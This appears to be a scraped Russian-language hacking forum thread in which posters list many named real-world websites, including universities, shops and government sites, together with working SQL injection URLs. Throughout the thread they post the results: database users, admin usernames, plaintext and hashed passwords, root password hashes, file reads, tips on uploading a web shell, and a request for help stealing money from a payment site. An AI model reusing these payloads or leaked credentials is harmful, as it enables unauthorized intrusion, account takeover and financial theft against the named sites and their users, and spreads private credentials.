[PR 4]
http://www.foodanddrinkfest.com/index.php?id=-45+union+select+1,2,3,4,concat_ws(0x3a,version(),d atabase(),user()),6,7,8,9,10,11,12,13,14,15,16
5.0.77:foodfest_fest:foodfest_food@localhost

[PR 3]
http://www.foodmachineryonline.com/product_desc.php?id=-1+union+select+1,2,3,4,5,6,7,8,concat_ws(0x3a,vers ion(),database(),user()),10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,30
4.1.22-standard-log:foodmactest:foodmactest@localhost

[PR 0]
http://auction.lebanese.us/product_desc.php?id=-38+union+select+1,2,concat_ws(0x3a,version(),datab ase(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17, 18,19,20,21,22,23,24,25,26,27,28,28,30,31,32,33,34 ,35
4.1.22-max-log:LebAuction:LebAuction@97.74.144.146

[PR 0]
http://www.10000vacations.com/rentals/product_desc.php?id=1+union+select+1,2,concat_ws(0 x3a,0x3c2f7469746c653e,version(),database(),user() ),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27
5.0.75-community-log:producx5_vacrentals:producx5_rentals@localhost

http://www.pro-limit.com/displayitemv10comp.php?item_id=-5198+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14 ,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30+f rom+users+/*+

http://www.arcep.fr/index.php?id=2124&L=%29&tx_gsactualite_pi1[uid]=-1151+union+select+1,2,3,4,concat_ws(0x3a3a,usernam e,password),6,7,8+from+be_users--&tx_gsactualite_pi1[annee]=&tx_gsactualite_pi1[theme]=&tx_gsactualite_pi1[motscle]=&tx_gsactualite_pi1[backID]=24&cHash=7257875ce6
$typo_db_username = 'arcep'; // Modified or inserted by TYPO3 Install Tool.
$typo_db_password = 'arcep&sql'; // Modified or inserted by TYPO3 Install Tool.
arcep_blog_admin:73c6ff6a9178b1138f60eb0fb26e669f - XX23TXX
arcepadm:b91761c6674315b460a532a8b1f636df - QLT23TPP


http://demo.pegas-studio.net/ind.php?id_typ=-73+UnIoN+SeLeCt+1,2,3,4,5,6,7,Concat_ws(0x3a3a,Use rname,User_password,User_email),9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28+from+phpb b_users+--+&tr=1

http://alvimed.com.ua/catalogue.php?action=viewitem&item_id=-34+union+select+1,2,3,4,5,6,7,database(),9+/*+
webkhark_alvimed

PR 4
http://www.gameszoo.org/voynichmonkeys/viewmsg.php?gr=1&num=15585+and+substring(version(),1,1)=5

Фух еле нашел русский сайт нехакнутый :D

http://www.allsportinfo.ru/
http://www.allsportinfo.ru/index.php?id=28147+UNION+SELECT+0,1,2,3,concat_ws( 0x0b,user(),version(),databa se()),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,2 1,22,23,24,25+LIMIT+600,1+--+
u55928@10.10.223.218
5.0.67-log
u55928


Таблы списком
http://www.allsportinfo.ru/index.php?id=28147+UNION+SELECT+0,1,2,3,concat_ws( 0x0b,table_name,column_name),5,6,7,8,9,10,11,12,13 ,14,15,16,17,18,19,20,21,22,23,24,25+FROM+INFORMAT ION_SC HEMA.COLUMNS+LIMIT+777,1000+--+


Админы списком
http://www.allsportinfo.ru/index.php?id=28147+UNION+SELECT+0,1,2,3,concat_ws( 0x0b,login,passwo rd),5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25+FROM+dom_adminlogin+LIMIT+600,1000+--+

Лохин: silencer
Пасс: huivam

Лохин: mitkov
Пасс: gubitludeinepivo

Лохин: tulenkov
Пасс: arhivarius

Лохин: slusarenka
Пасс: vlitvunatankah


Админка стандартная просто дописываем Админ/
В админке можно залить шелл, только через картинку

www.vdiec.edu.in

http://www.vdiec.edu.in/go.php?show=about&id=-1+union+select+1,concat_ws(0x0b,version(),user(),d atabase()),3,4,5,6

Версия - 4.1.22-STANDARD
Юзер - VDIEC_ROOT@LOCALHOST
БД - VDIEC_DATA

Путь до админы
http://www.vdiec.edu.in/admin/login.php
Доступна табличка - members (подбирайте...)

http://cms.wmhelp.com//index.php?p=poll&showresult=1&poll_id=-1+union+select+concat(email,0x3a,pass),1,2,3+from+ kpro_user

http://www.sudeoptik.com/admin/

yunusemre@birpiksel.com:98d292620ce4e8087db271b691 e28a4c : 458796

https://php.csumb.edu/infotech/brp/r_summary.php?id=-99999'+union+select+1,version(),3/*
Database Version: 5.0.45
Database name: brp
User name: brp@localhost

http://www.learn.unh.edu PR 5
http://www.learn.unh.edu/pcw/pd/sched.php?id=51+union+select+concat_ws(0x3a,versio n(),database(),user())/*

Database version: 5.0.45
Database name: 37560_learnunhedu
User name: 37560_user395554@lnh-www1b.bluehalo.myregisteredsite.com

AdminUsers:
http://www.learn.unh.edu/pcw/pd/sched.php?id=51+union+select+concat_ws(0x3a,userna me,password)+from+AdminUsers/*

username : admin
password : AA422kbolton

http://www.learn.unh.edu/admin

http://www.neari.com/book.php?id=-32+union+select+1,concat_ws(0x3a,(select+name+from +users),(select+password+from+users),user(),databa se(),version()),3,4,5,6,7,8,9,10,11,12,13,14+

вывод в титле

4я ветка.

Логин - diane
Пассворд - 4f8c0d28489d5d0ee78dc35f61347b24 - nearipress

Админки не нашел

http://www.newandusedpalletracking.co.uk/article.php?id=-54+union+select+1,2,3,concat_ws(0x3a,version(),dat abase(),user())4.1.22:threejc:threejc@localhost
http://www.greatandhra.com/ganews/viewnews.php?id=-13116+union+select+1,2,3,4,concat_ws(0x3a,version( ),database(),user())--&scat=255.0.77-сommunity:ga_news:venkat@174.120.39.50
http://www.greatandhra.com/ganews/viewnews.php?id=-13116+union+select+1,2,3,4,concat_ws(0x3a,user,pas sword,file_priv)+from+mysql.user--&scat=25root:*0525C96363D8CBCFC3E75DA251B92E10F9B43 620:Y http://www.interspaziale.it/firme/articolo.php?id=-20223+union+select+1,2,unhex(hex(concat_ws(0x3a,ve rsion(),database(),user()))),4,5,6,7,8,9,10,11,12, 13,14,15,16
4.1.10-log:internazionale:internazionale@10.10.0.11http://vesen.hydra.is/spjald/slinkarc.php?id=-15383+union+select+concat_ws(0x3a,version(),databa se(),user())5.0.24a-Debian_9ubuntu2-log:ymis:root@localhosthttp://vesen.hydra.is/spjald/slinkarc.php?id=-15383+union+select+concat_ws(0x3a,user,password,fi le_priv)+from+mysql.user
root:40ede04861443872:Y

http://www.nzcamping.co.nz/region.php?id=-1+union+select+1,2,3,4,version(),6,7,8,9,10/*

version: 4.0.27-standard-log
user: nzcampin@202.191.34.7
database: nzcampin

http://www.theatreview.co.nz/reviews/review.php?id=-1+union+select+1,2,3,4,5,version(),7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29 ,30/*

При попытке узнать версию и т.д. столкнулся с проблемой кодировки, то есть такого содержания >>Illegal mix of collations (latin1_swedish_ci,IMPLICIT) and (utf8_general_ci,SYSCONST) for operation 'UNION'
Также пробовал подставить запросы вида
char()
перед union'ом ставил: COLLATE utf8_general_ci и т.д.
Но, увы, так ничего и не вышло, может, у кого нибудь получится раскрутить эту SQL инъекцию.

Xizor http://forum.antichat.ru/thread104591.html

http://www.theatreview.co.nz/reviews/review.php?id=-1+union+select+1,2,3,4,5,cast(concat_ws(0x3a,Versi on(),database(),user(),@@version_compile_os)+as+bi nary),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 ,23,24,25,26,27,28,29,30/*


Version : 4.1.15-LOG
Database : THEATREVIEW
User : THEATREVIEW@LOCALHOST
Os : REDHAT-LINUX-GNU

http://journals.volunteer.org.nz/entry.php?id=1834+union+select+1,2,concat_ws(0x3a, version(),database(),user()),4,5,6,7+from+user+lim it+1,1/*
version():4.0.24_Debian-10sarge3-log
database():journals
user():journals@localhost

http://journals.volunteer.org.nz/entry.php?id=1834+union+select+1,2,concat_ws(0x3a, name,password),4,5,6,7+from+user+limit+1,1/*
Administrator:freedom1
__
http://www.theatreview.co.nz/reviews/review.php?id=2237++union+select+1,2,3,4,5,unhex(h ex(concat_ws(0x3a,version(),database(),user()))),7 ,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24, 25,26,27,28,29,30+limit+1,1/*

version()4.1.15-LOG
database():THEATREVIEW
user():THEATREVIEW@LOCALHOST

какойто китайский шоп...

http://shop.rzxx.com/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat (user(),0x7c,version(),0x7c,database()),8/*

rzxxshop@localhost|4.0.25-nt-log|rzxxshop


http://shop.rzxx.com/user.php?act=order_query&order_sn=%27%20union%20select%201,2,3,4,5,6,concat (user_name,0x7c,password,0x7c,email),8%20from%20ec s_admin_user/*

admin|e68969db498985f423ece7ba02213c24:bluehut51|b luehtu@163

на сервере стоит WINNT

Safe-mode: ON (secure)

кста на главном сайте PR:4

Харківський національний університет внутрішніх справ :D
http://www.univd.edu.ua/index.php?id=-1+union+select+1,concat_ws(version(),database(),us er()),3--
Database Version: 5.0.67-log
Database name: univd
User name: univd@localhost
http://www.univd.edu.ua/index.php?id=-1+union+select+1,table_name,3+from+information_sch ema.tables--
Таблиц огромное количество.

http://www.abiturcenter.ru/testi/begin.php?log=guest&step=2&sc_id=15+union+select+1,concat_ws(0x3a,version(),u ser(),database()),3,4,5,6/*
4.0.27-log:www1@zvm7.host.ru:abiturdb

ТИЦ 1600

http://www.donstroy.info/architectors/demon.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4
donstroy@miami.skif.net:donstroy:4.0.27

http://ihtc.ru/device.php?id=-39+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,concat_ws(0x3a,version(),user(), database())
4.1.22:digs_mysql@194.85.95.84:digs_ihtc

на сайте есть форум, phpbb, попробуем обратиться к phpbb_users

http://ihtc.ru/device.php?id=-39+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,38+from+phpbb_users
"38" выводится, пробуем вырвать юзеров и пароли

http://ihtc.ru/device.php?id=-39+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31, 32,33,34,35,36,37,concat_ws(0x3a,user_id,username, user_password)+from+phpbb_users+limit+1,1

меняем limit...


-1::Anonymous
2:912cf5e2e231609b0d0fce0f677dc579:newspalm
3:25849d65beb0a2793b2c2d0dd72b84cc:Megabass
4:470671a0ab36f8e7c496312fc794122e:/DiOs
5:421b47ffd946ca083b65cd668c6b17e6:quinine
6:a2c97337264f510aaba2f42f0a58a66f:InReklama
7:8d0c6f638e1326e65c53beba2a41b1eb:Gover
8:7d82c72e13cb1fe7b29b1cba10d468c3:Denis

и т.д.

------------------

http://www.blesna-n.ru/fotoalbum.php?rez=-2+union+select+11111,22222,concat_ws(0x3a,version( ),user(),database())
отображается в ссылке (<A HREF=../pic/big_regats/4.1.22:blesnan@tix.hc.ru:wwwblesnanru target="1" или просто посмотреть в статусе при наведении на месте где должна была быть фотка :) )

----------------

http://www.clever.saratov.ru/site/photo/index.php?id_parent=2+and+substring(version(),1,1) =5

-----------------

http://www.3eye.ru/screen-info.php?screen=-7+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4,5,6,7,8,9
4.0.17:3eye@localhost:3eye

http://www.gmpr.ru
http://www.gmpr.ru/news_item.php?id=-669'+UNION+SELECT+0,1,con cat_Ws(0x0b,user(),version(),database()),3,4,5,6,7 ,8,9+--+
gmpr@localhost
5.0.45-log
gmpr

Логин: 26
Пасс:55
Куда вводить ХЗ ))

http://www.mobilecomm.ru
http://www.mobilecomm.ru/view.php?id=-243'+UNION+SELECT+0,1,2,3,4,concat_ws(0x0b,user(), data base(),version()),6,7+--+

z90196_mobilecom@77.221.130.20
z90196_mobilecom
5.0.32-Debian_7etch4-log

http://www.konka.co.nz/productdetail.php?id=33+union+select+1,2,concat_ws (0x3a,version(),database(),user()),4,5,6,7,8,9,10, 11,12,13,14,15+limit+1,1/*

version():4.1.22-standard-log
database():ncpgroup_konka
user():ncpgroup_konka@localhost

http://www.konka.co.nz/productdetail.php?id=33+union+select+1,2,concat_ws (0x3a,username,password),4,5,6,7,8,9,10,11,12,13,1 4,15+from+users+limit+1,1/*

admin:21232f297a57a5a743894a0e4a801fc3

http://www.thefashioninsider.com/mobil.php?rub=supermodels&id=35+and+substring(version(),1,1)=3
http://comicstrip.ca/make.php?id=282+and+substring(version(),1,1)=5

http://www.cis.uab.edu PR 5
http://www.cis.uab.edu/news/sem_details.php?id=-1+union+select+concat_ws(0x3a,version(),database() ,user()),2,3,4,5,6/*

Database version : 4.1.20-log
Database name : db
User name : web@monkey.cis.uab.edu

http://www.scorcher.ru
http://www.scorcher.ru/subject_index/subject_show.php?id=-4249+UNION+SELECT+0,concat_Ws(0x0b,user(),ve rsion(),database()),2,3,4,5,6,7,8,9

scorcher0@localhost
5.0.27
scorcher


Юзеры какие-то
http://www.scorcher.ru/subject_index/subject_show.php?id=-4249+UNION+SELECT+0,concat_Ws(0x0b,emailAddress,pa ss wd,realName),2,3,4,5,6,7,8,9+FROM+yabbse_members+L IMIT+0,1

fornit@wmail.ru
af2dyfoj97nAU
fornit

Автор сайта походу постебатся решил над хакерами ))
http://www.scorcher.ru/hruk/hruk.php

http://leoshow.com/short.php?id=-33+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5,6,7,8,9/*
4.0.27-log:artmasterofby@eclipse.tutby.com:artmasterofby

http://www.adecor.ru/plastic-one-subitem.php?item_id=1&subitem_id=-6+union+select+1,table_name,3,4+from+information_s chema.tables+/*+

http://adekor.ru/plastic-one-subitem.php?item_id=2&subitem_id=-10+union+select+1,table_name,3,4+from+information_ schema.tables+/*+

http://www.superkrovlya.ru/files/print_page.php?ID=&t=d&mid=-151+UnIoN+SeLecT+database(),2,3,4,5,6,7,8+/*+&item_id=54

http://www.partymaker.lv/?l=-1'+union+select+1,2,3,concat_ws(0x3a3a,database(), version()),5,6,7+--+&item_id=13
partymaker::4.0.26

http://www.mbvo.wwu.edu PR 5
http://www.mbvo.wwu.edu/abstracts/abstractText.php?id=-1+union+select+1,concat_ws(0x3a,version(),database (),user()),3,4,5--

Database version : 5.0.75
Database name : mbvo
User name : mbvoUser@localhost

Уязвимость на сайте http://www.marcialpons.es

Уязвимый скрипт: http://www.marcialpons.es/fichalibro.php?id=100708769

Версия БД: 4.1.20
Имя БД: Libreria
Юзер: root@localhost
ОС: redhat-linux-gnu

Директория сайта:
/var/www/html

Есть привелегия типа файл, вот .htaccess в папке admin:
http://www.marcialpons.es/fichalibro.php?id=100708769%27+and+0+union+select+ 1,2,3,LOAD_FILE(%27/var/www/html/admin/.htaccess%27),5,6,7,8,9,10,11,12,13,14,15,16,17,18 ,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,3 5,36,37,38,39,40,41,42,43,44,45,46,47,48,49,50,51, 52,53,54,55,56,57,58,59,60,61,62,63,64,65,66,67,68 ,69,70,71,72,73,74,75,76,77,78,79,80,81,82,83,84,8 5--+

Можно залить шел.

Есть доступ к mysql.user
http://www.marcialpons.es/fichalibro.php?id=100708769%27+and+0+union+select+ 1,2,3,concat(user,0x3a,password),5,6,7,8,9,10,11,1 2,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28, 29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45 ,46,47,48,49,50,51,52,53,54,55,56,57,58,59,60,61,6 2,63,64,65,66,67,68,69,70,71,72,73,74,75,76,77,78, 79,80,81,82,83,84,85+from+mysql.user--+

Моё видео со взломом этого сайта
http://forum.antichat.ru/showthread.php?p=1319721#post1319721

http://www.evergreenrecreation.com PR 4
http://www.evergreenrecreation.com/facilities.php?id=-1+union+select+1,2,3,concat_ws(0x3a,version(),data base(),user()),5,6,7,8,9,10,11,12/*

Database version : 4.1.25-Debian_mt1
Database name : db49768_eprd
User name : db49768@72.47.224.21

users:
http://www.evergreenrecreation.com/facilities.php?id=-1+union+select+1,2,3,concat_ws(0x3a,username,passw ord),5,6,7,8,9,10,11,12+from+users/*

username : eprdadmin
password : 665c6986e7fbd5ef7c89d2cbb1464f2b

3-ий мускул
http://www.1019thewave.com/community/promo.php?id=12+and+substring(version(),1,1)=3
----------------
http://www.mygreatfood.com/promo.php?id=-2+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versio n(),user(),database()),9,10,11,12,13,14,15
5.0.45:mygreatfood@localhost:mygreatfood

куча таблиц, на что-то интересное похожф MemberInfo

http://nmefc.nmt.edu PR 4
http://nmefc.nmt.edu/ContactUs.php?id=-1+union+select+1,2,concat_ws(0x3a,version(),databa se(),user())--

Database version : 5.0.67-0ubuntu6
Database name : nmefc
User name : nmefcpub@localhost

http://galadarihotel.lk/promo.php?id=-4+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7
5.0.77-community:galadari_user@localhost:galadari_db

в таблицах нет юзера/пассворда.

http://www.bestofbeing.ca/promo.php?id=-9+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7
4.1.25-Debian_mt1:db15459@64.13.232.26:db15459_bestofbein g

PR5
http://cs.tcnj.edu/website/facultyview.php?id=-99999+union+select+version(),2,3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17--
Database Version: 5.0.51a-3ubuntu5.4
Database name: deptWebSite
User name: wwwsite@csprod.TCNJ.EDU

Getting Data from table g2_User ( Rows) from database gallery2
Fields g_userName:g_hashedPassword

[0]:guest:1R\\0c363332a05345c8e22287768abe7bcd
[1]:admin:LjSE938e074bdcdd55e531547bf94f2decde

http://cs.tcnj.edu/gallery2/main.php

опять 3-ий мускул
http://www.ultra-it.com/promo.php?Id=2+and+substring(version(),1,1)=3

http://simbatron.ru

simbatron : Ввод, вывод, купить, продать, обмен Webmoney, наличные E-gold. Карты WMZ, WMR. Переводы Western Union, Wire Transfer, WM, Fethard, Яндекс.Деньги

http://simbatron.ru/auto_sota.php?metod=popoln&pnump=-375'+UNION+SELECT+0,concat_Ws(0x0b,0x0b,user(),ver sion(),database(),0x0b),2+--+&p=201

simbatron_mysql@194.85.90.24
4.1.22
simbatron_db


если кто найдет как спионерить деньги стучите в ЛС, буду благодарен ))))

http://www.m-trans.vbg.ru/bl.php?id=-105+union+select+1,concat_ws(0x3a,version(),user() ,database()),3,4,5,6,7,8,9
4.0.12:mtrans@localhost:mtrans

Есть таблица users
http://www.m-trans.vbg.ru/bl.php?id=-105+union+select+1,concat_ws(0x3a,id,login,pass),3 ,4,5,6,7,8,9+from+users

1:mtrans:0d0b9ff307d6c7f6

Админка: http://www.m-trans.vbg.ru/admin.php
------------
http://yellopagespakistan.com/yp/bl.php?subcat=254+and+substring(version(),1,1)=5

Скуля на http://www.incult.es

Уязвимый скрипт: http://www.incult.es/projectinfo.php?id=8

Версия БД: 5.0.32-Debian_7etch10-log
Имя БД: incult
Юзер: incult@localhost
ОС: pc-linux-gnu

Таблицы, не входящие в information_schema
http://www.incult.es/projectinfo.php?id=8%27+and+0+union+select+1,2,3,4 ,5,6,7,8,9,10,11,group_concat(table_name),13,14,15 ,16,17,18,19,20,21+from+information_schema.tables+ where+table_schema%3C%3E%27information_schema%27--+

Больше ничего интересного не нашёл.

http://www.csm.org.nz/distance/index.php?id=191%27+union+select+concat_ws(0x3a,ve rsion(),database(),user())+limit+1,1/*

version():4.0.27-standard-log
database():csm
user():thoseguys@ws4.int.mydns.net.nz

http://www.csm.org.nz/distance/index.php?id=191%27+union+select+concat_ws(0x3a,us er,pass)user+from+users+limit+1,1/*

thoseguys:55ffc53f170544b887252ff7e454e5a3

Скуля на http://biblioteca.unizar.es

Уязвимый скрипт:http://biblioteca.unizar.es/biblio.php?id=27

Версия БД: 4.0.20-standard
Имя БД: biblioteca-biblioteca
Юзер: webiblio@alano.unizar.es
ОС: pc-linux

Список юзеров и их паролей:
http://biblioteca.unizar.es/biblio.php?id=-27+union+select+concat_ws(0x3a,login,pwd),2,3,4,5, 6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23, 24,25,26,27,28,29,30,31,32,33,34,35,36,37+from+usu arios+limit+0,1--+

Привилегии FILE и доступа к mysql.user нет.

PR 2
http://www.colgate13.org/members.php?memid=-1+union+select+1,2,unhex(hex(concat_ws(0x3a,versio n(),database(),user()))),4,5,6,7,8,9,10,11,12,13,1 4/*

Database version : 4.1.16-standard-log
Database name : colgate13
User name : thirteen@grant.dreamhost.com

http://www.invictory.com.ua/tips_issue.php?id=1000000+union+select+1,2,concat_ ws(0x3a,user(),version(),database()),4,5,6+--+

ivcomua_db@localhost:4.1.22-standard:ivcomua_db


####################################
oracle :D

http://oracle.ukrsat.com/tutorial/openxs.php?n=80+and+substring(version(),1,1)=3

########################################
http://bloggreenwood.com/members/profile_view_ind.php?id=1'+and+substring(version() ,1,1)=5+--+

Ну и мое видео первое на ачате )) :D

http://forum.antichat.ru/thread124487.html ссылка там ))

третья мускуль

http://www.bicentenary.tas.gov.au/text.php?id=66+and+substring(version(),1,1)=3

http://www.akpr.ru/rep.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6u44790@10.10.223.230:u44790:5.0. 67-loghttp://www.newchemistry.ru/rep.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8,9u44790@10.10.223.230:u4479 0_3:5.0.67-loghttp://polymery.ru/rep.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8,9u44790@10.10.223.230:u4479 0:5.0.67-log
http://petrochemistry.ru/rep.php?id=-1+union+select+1,2,concat_ws(0x3a,user(),database( ),version()),4,5,6,7,8,9u44790@10.10.223.230:u4479 0_2:5.0.67-log

PR 6
http://www.mhfa.com.au/instructor_details.php?id=-694+union+select+1,2,concat_ws(0x3a,version(),data base(),user()),4,5,6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,3 4,35,36,37,38,39,40,41,42,43,44,45,46,47,48/*

Database version : 4.1.22-standard-log
Database name : mhfa_db
User name : mhfa@10.194.10.112

http://php.louisville.edu/news/multimedia/multimedia.php?id=-99999+union+select+1,2,3,4,5,6,version(),8,9,10,11/*
Database Version: 5.0.27-standard
Database name: releases
User name: releases@136.165.237.189

PR3
http://mywebs.ru/text.php?id=-10+union+select+1,2,3,concat_ws(0x3a,version(),use r(),database()),5
5.0.67-log:u50510@10.10.153.173:u50510
-------------
Решил пройтись слегка по разделу Портфолио... нашел ещё несколько уязвимых сайтов:

PR4, ТИЦ 130
http://triluchnik.ru/text.php?id=-16+union+select+1,concat_ws(0x3a,version(),user(), database())
5.0.67-log:u83453@10.10.223.247:u83453

Заинтересовала таблица: pixelpost_config
Выдираем данные
http://triluchnik.ru/text.php?id=-16+union+select+1,concat_ws(0x3a,id,admin,password ,email)+from+pixelpost_config
1:admin:e807f1fcf82d132f9bb018ca6738a19f:test@eer. ru
Расшифровываем:
e807f1fcf82d132f9bb018ca6738a19f = 1234567890

Есть вход админский через http://triluchnik.ru/admin
там авторизация видимо через .htaccess, с указанными данными не получается.

www.surf2surf.co.nz
[PR=4]

http://www.surf2surf.co.nz/page.php?id=-111+union+select+1,concat_ws(0x0b,version(),user() ,database()),3,4,5,6,7

Версия - 5.0.45
Юзер - surf2surf@localhost
БД - surf2surf

P.S. доступ к табличкам закрыт

PR2, ТИЦ 40
http://nissanbu.ru/show_new.php?id=-6+union+select+1,2,concat_ws(0x3a,version(),user() ,database()),4
4.0.27-max-log:nissan60@v52.valuehost.ru:nissan60

------
PR2, ТИЦ 90
http://www.honda.spb.ru/news-text.php?id=-158+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7
4.1.22:ralfart@localhost:ralfart

p.s. Dimonx есть таблица admanager с кучей таблицей, всё доступно. кавыряй.

http://www.promiseland.it/view.php?id=-2975/**/UNION/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16

Database Version: 5.0.45-log
Database name: promiseland_news
User name: promise_guest@localhost

PR1
http://www.akalita.com/press/text.php?id=-4+union+select+1,concat_ws(0xa,version(),user(),da tabase()),3,4,5
5.0.67-log u98256@10.10.153.180 u98256_akalita

Видимо на одном акке, несколько сайтов, которые пока не нашел
Доступно несколько баз данных: u98256,u98256_1981,u98256_blog,u98256_akalita
u98256_blog - вордпрессовская база данных.

вытащил с wp_users админа
1:admin:$P$Bol8Q7tR5wPHFqk6NkjB7R6/7FdLFa0

в других базах ничего касающегося авторизации нет, в конфигах видимо всё прописано.

PR6
http://corsair.cs.iupui.edu:20191/picturegallery/photo.php?id=-99999+union+select+1,2,3,version(),5/*
Database Version: 5.0.22-standard
Database name: jsellmer_db
User name: jsellmer@localhost

Getting Data from table phpbb_users ( Rows) from database test
Fields username:user_password
[0]:Anonymous:
[1]:arowls:39b35d4edd6999d6bfaf563bfa2bb661
[2]:solivares:b2693d9c2124f3ca9547b897794ac6a1(maya)
[3]:Brian Lewis:2f2b4669f9c0d578a94c9a32fc72f1c8

Getting Data from table userList ( Rows) from database test_db
Fields user:pass:email
[0]:nidodson:password:nidodson@gmail.com
[1]:na3d:password:nidodson@iupui.edu

PR0, ТИЦ 0
http://www.zhukovs.ru/text.php?id=-9+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,versio n(),user(),database()),9,10,11/*
4.0.20-log:brainz@localhost:brainz
Есть база users, поля подобрал только user_id, user_password... искал где хранится имя пользователя, ... кончилась фантазия.
http://www.zhukovs.ru/text.php?id=-9+union+select+1,2,3,4,5,6,7,concat_ws(0x3a,user_i d,user_password),9,10,11+from+users/*
1:76a2173be6393254e72ffa4d6df1030a
Хэш расшифровался легко:
76a2173be6393254e72ffa4d6df1030a = passwd

www.tech-pack.co.nz
[PR: 1]

http://www.tech-pack.co.nz/page.php?id=11+union+select+1,2,3,4,concat_ws(0x0b ,version(),user(),database()),6,7,8

Версия - 4.0.26-standard
Юзер - techp@localhost
БД - techp

www.todayskitchens.co.nz
[PR: 2]

http://www.todayskitchens.co.nz/page.php?id=-11+union+select+1,2,3,4,concat_ws(0x0b,version(),u ser(),database()),6,7,8

Версия - 4.0.26-standard
Юзер - todaysk@localhost
БД - todaysk

www.adventureconcepts.co.nz
[PR: 3]

http://www.adventureconcepts.co.nz/page.php?id=11+union+select+1,2,3,4,table_name,6,7 ,8+from+information_schema.tables

Версия - 5.0.37-standard
Юзер - advent_cms@localhost
БД - advent_cms

http://www.adventureconcepts.co.nz/page.php?id=11+union+select+1,2,3,4,concat_ws(0x3a ,table_name,column_name),6,7,8+from+information_sc hema.columns

Все таблицы и колонки к ним

www.gearcutting.co.nz
[PR: 1]

http://www.gearcutting.co.nz/page.php?id=-11+union+select+1,2,3,4,concat_ws(0x0b,version(),u ser(),database()),6,7,8


Версия - 4.0.26-standard
Юзер - gearcms@localhost
БД - gearcms

www.clockworkstudio.co.nz
[PR: 2]

http://www.clockworkstudio.co.nz/page.php?id=-11'+union+select+1,2,3,4,5,6,concat_ws(0x0b,versio n(),user(),database()),8,9,10/*

Версия - 4.0.27-standard-log
Юзер - schmoove@ws5.int.mydns.net.nz
БД - clockwork

Табличка с юзерами:

http://www.clockworkstudio.co.nz/page.php?id=-11'+union+select+1,2,3,4,5,6,concat_ws(0x0b,userna me,password),8,9,10+from+users+limit+1,1/*

nick
378867a9bad163c4c77062685b3584af:cl0ckw0rk

Админка
www.clockworkstudio.co.nz/admin/
Логин - nick
Пасс - cl0ckw0rk

PR5
http://www.stadtumbau-ost.info/index.php?request=/service/email-abo/nl-text.php?id=-41+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4
4.1.22-standard-log:db63113@local2:db63113

PR5, ТИЦ 140
http://www.uapravo.org/text.php?id=-1189+union+select+1,2,3,4,concat_ws(0x3a,version() ,user(),database()),6,7,8,9,10,11
5.0.32-Debian_7etch10-log:oleps@localhost:uapravo
просмотрел таблицы, что касается пользователей, ничего нет...

PR4, ТИЦ 1400
http://edina-rodina.org/text.php?id=14+and+substring(version(),1,1)=5

PR4
http://www.lennartpersson.se/text.php?ID=910+and+substring(version(),1,1)=5

PR4
http://www.zionmag.org/text.php?id=633+and+substring(version(),1,1)=4

PR4, ТИЦ 10
http://auto.properm.ru/sale/text.php?id=7177+and+substring(version(),1,1)=5/*

PR0, ТИЦ 0
http://realmagazine.ru/rmgid/text.php?id=-604+union+select+1,2,3,4,concat_ws(0x3a,version(), user(),database())
4.1.22-log:simplema_wwwreal@fe80.hc.ru:wwwrealmagaziner_w wwrealmagaziner

PR0, ТИЦ 0
http://www.mdsg.org.uk/text.php?ID=-0+and+substring(version(),1,1)=5

http://www.aman-diir.ae/more_news.php?id=-1+union+select+1,2,concat_ws(0x20,version(),user() ,database()),4,5,6,7+from+news

version: 5.0.45
user: amanmysql@localhost
database: db_news


tables
http://www.aman-diir.ae/more_news.php?id=-1+union+select+1,2,table_name,4,5,6,7+from+informa tion_schema.tables+limit+49,1

columns
http://www.aman-diir.ae/more_news.php?id=-1+union+select+1,2,column_name,4,5,6,7+from+inform ation_schema.columns+where+table_name=%27userlist% 27+limit+2,1

inset into news
columns
News_Language
News_Title
News_Description
News_Priority
News_Date
News_Active

http://www.aziendegratis.it/sito.php?linkid=-10694+UNION+SELECT+1,version(),3,4,5,6,7,8,9,10,11 ,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,2 8,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44, 45/*

4ветка.....тут картон есть....вообщем наздоровье

